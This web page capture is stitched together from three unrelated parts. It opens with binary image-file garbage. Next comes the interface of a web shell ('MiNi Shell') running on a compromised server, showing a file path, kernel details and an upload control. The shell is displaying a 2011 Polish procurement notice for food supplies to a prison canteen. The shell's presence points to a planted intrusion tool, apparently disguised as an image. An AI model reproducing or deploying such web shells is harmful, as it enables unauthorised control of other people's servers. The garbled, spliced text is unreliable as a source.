JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110130/14726-N-2011.html

<p class="kh_header"><b>Czerwony Bór: Dostawa różnych produktów spożywczych i produktów suszonych na rzecz kantyny w Zakładzie Karnym w Kluczborku.</b><br>
<b>Numer ogłoszenia: 14726 - 2011; data zamieszczenia: 30.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaska Instytucja Gospodarki Budżetowej "BIELIK" , Czerwony Bór 23, 18-400 Czerwony Bór, woj. podlaskie, tel. 86 216 36 04, faks 86 216 31 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igbbielik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych i produktów suszonych na rzecz kantyny w Zakładzie Karnym w Kluczborku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. PRZEDMIOT ZAMÓWIENIA
1.	Przedmiotem zamówienia jest dostawa różnych produktów spożywczych i produktów suszonych,  według wyszczególnienia zawartego w pkt 2. 
2.	Wyszczególnienie przedmiotu dostawy : 
L.p.	Asortyment	J.m.	Ilość do
1.	sól 1kg	kg.	1 000
2.	sól 250g	kg	100
3.	przyprawa w proszku do zup i dań mięsnych 200g.	kg	20
4.	keczup Hellmans 490g	kg	147
5.	ketchup Puldliszki 480g	kg	480
6.	kwasek cytrynowy 20g	kg	20
7.	ketchup Dawtona 500g	kg	500
8.	majeranek 20g	kg	1
9.	majonez napoleoński 320ml	kg	39
10.	musztarda 175 g	kg	175
11.	musztarda 210g-plastik	kg	84
12.	soda oczyszczona 80g	kg.	16
13.	papryka ostra mielona 20g	kg	4
14.	papryka słodka mielona 20g	kg	4
15.	pieprz naturalny mielony 20g	kg	6
16.	pieprz ziołowy mielony 20g	kg	4
17.	przyprawa do zup 0,2l	l	20
18.	kostka rosołowa 60g +-20g	kg	30
19.	sos knorr 25-30g	kg.	25
20.	sos sałatkowy 9g Knorr	kg	1
21.	sosy  300g Łowicz	kg	30
22.	sos tatarski 260g	kg	26
23.	cynamon mielony 20g	kg	10
24.	barszcz czerwony 0,200g	kg	20
25.	żelatyna 50g	kg	10
26.	migdały 80g	kg.	30
27.	orzechy włoskie łuskane 80g	kg.	30
28.	wiórki kokosowe 100g	kg.	30
29.	śliwka suszona 100g	kg	5
30.	rodzynki 100g	kg	50
31.	przyprawa do zup Maggi 200g	kg	30
32.	przyprawa Vegeta 200g	kg	80
33.	przyprawa Warzywko 200g	kg	20
34.	przyprawa Vegeta 75g	kg	50
35.	sos Develey 200g	kg	10
36.	miód 30ml	kg	15
37.	miód 250g ( naturalny)	kg	50
38.	makaron 400g	kg	200
39.	Cukier 1 kg	kg	2 500
40.	Cukier w kostkach 1kg	kg	200
41.	słodzik ( opakowanie 200szt)	szt	200
42.	Śmietanka do kawy Cremona 200g	kg	80
43.	wafle ryżowe naturalne 100g	szt.	30
44.	guma do żucia drażetki  ORBIT 	op	1 000
45.	guma do żucia listki ORBIT	op	100
46.	suchary bez cukru 285g	szt.	40
47.	zupka błyskawiczna Vifon 70g	kg	350
48.	zupka błyskawiczna Knorr  60-70g	kg	250
49.	zupka błyskawiczna Amino 60-70g	kg.	256
50.	zupka błyskawiczna KIM-LAN 70-75g	kg	300
51.	zupka gorący kubek  09-20g	kg	7,5
52.	pieczywo chrupkie  BAKE ROLLS 90g	szt.	300
53.	pieczywo chrupkie WASA 140g	szt.	300
54.	galaretka owocowa 100g	szt.	5000
55.	kisiel  40-65g	kg	12,3
56.	budyń 40-65g	kg	12,3
57.	kisiel Słodka chwila 31,5-34g	kg	15,5
58.	budyń Słodka chwila 41-46g	kg	15,5
59.	kotlety sojowe 100g	kg.	20
60.	kaszka nestle mleczno-ryżowa 230g	kg.	115

3. Warunki jakie musi spełnić przedmiot dostawy i warunki dostawy: 
1)	przedmiot dostawy musi spełniac wymogi określone przez Zamawiającego dla każdego rodzaju asortymentu, i spełniać wymogi określone przepisami odrębnymi, 
2)	dostarczany asortyment musi być uszkodzeń o charakterze fizycznym i biochemicznym obniżających jego wartość, 
3)	dostawa będzie zrealizowana w godzinach od 7.30 do 13.30, w ciagu dwóch dni roboczych od momentu otrzymania przez Wykonawcę zamówienia,
4)	Wykonawca dostarczy przedmiot zamówienia własnym transportem, na własny koszt do Kantyny w Zakładzie Karnym w Kluczborku, ul. Katowicka 4. 
5)	Wykonawca dokona wyładunku dostarczonego asortymentu w miejscu lub miejscach składowania wskazanym przez Zamawiającego:
6)	W przypadku zamawiania przez Zamawiającego większych partii towaru stanowiącego przedmiot zamówienia, Zamawiający ma prawo do określenia minimalnego terminu przydatności do spożycia.
7)	Wykonawca dostarczy przedmiot zamówienia w opakowaniach zbiorczych zapewniajacych odpowiednie zabezpieczenie dostarczanego asortymentu.
8)	Dostawca zabezpieczy przedmiot zamówienia przed niekorzystnym oddziaływaniem warunków atmosferycznych na dostarczany towar w trakcie transportu. 
4.	Zamawiający zastrzega sobie prawo do przedłużenia terminu obowiązywania umowy w sprawie udzielenia zamówienia do czasu wyczerpania asortymentu będącego przedmiotem zamówienia, z zastrzeżeniem że Zamawiający  może w zależności od potrzeb zamówić większą ilość jednego z asortymentów będących przedmiotem zamówienia, kosztem innego pod warunkiem że ogólna wartość umowy nie ulegnie zmianie.  Zamawiający może nie wyczerpać całości asortymentu będącego przedmiotem umowy, bez żadnych konsekwencji.
5.	Termin płatności wynagrodzenia należnego Wykonawcy wynosi 30 dni od daty dostarczenia prawidłowo wystawionej faktury do siedziby Zamawiającego.
6.	Zamawiający nie przyjmie faktury jeżeli zostaną zgłoszone jakiekolwiek zastrzeżenia do przedmiotu dostawy. 
7.	Zamawiający w terminie 7 dni roboczych licząc od dnia dostawy ma prawo reklamować przedmiot dostawy. 
8.	Na rozpatrzenie reklamacji Wykonawca ma 7 dni roboczych. 
9.	W przypadku uznania reklamacji Wykonawca w ciągu 7 dni roboczych usunie zgłoszone nieprawidłowości poprzez uzupełnienie dostawy w przypadku rozbieżności w ilości lub - wymieni towar na nowy w przypadku zakwestionowania jakości.
10.	Reklamacje Zamawiający będzie zgłaszał pocztą, telefonicznie lub faksem za potwierdzeniem, do osoby wskazanej przez Wykonawcę.
11.	Nie udzielenie odpowiedzi na złożoną reklamację w ciągu 7 dni roboczych od dnia jej otrzymania przyjmuje się za uznanie reklamacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	zmiana stawki podatku VAT  lub akcyzy
2.	po upływie terminu niezmienności cen określonego  w ofercie, dopuszcza się zmianę umowy w zakresie wzrostu cen, przy czym wzrost ceny może nastąpić raz na 3 miesiące w granicach nie przekraczających wskaźnika wzrostu cen towarów i usług konsumpcyjnych ogłoszonego przez Prezesa GUS za kwartał poprzedzający podwyżkę , publikowanego w Monitorze Polskim 
3.	w przypadku, gdy nastąpi wymiana asortymentu, gdy producent zaprzestanie produkcji asortymentu określonego w ofercie i umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbbielik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podlaska Instytucja Gospodarki Budżetowej Bielik z siedzibą w Czerwonym Borze, 
Czerwony Bór 23
18-400 Łomża, 
tel. (086) 215-35-95
www.igbbielik.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2011 godzina 12:00, miejsce: Podlaska Instytucja Gospodarki Budżetowej Bielik z siedzibą w Czerwonym Borze, 
Czerwony Bór 23
18-400 Łomża, 
tel. (086) 215-35-95
www.igbbielik.pl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com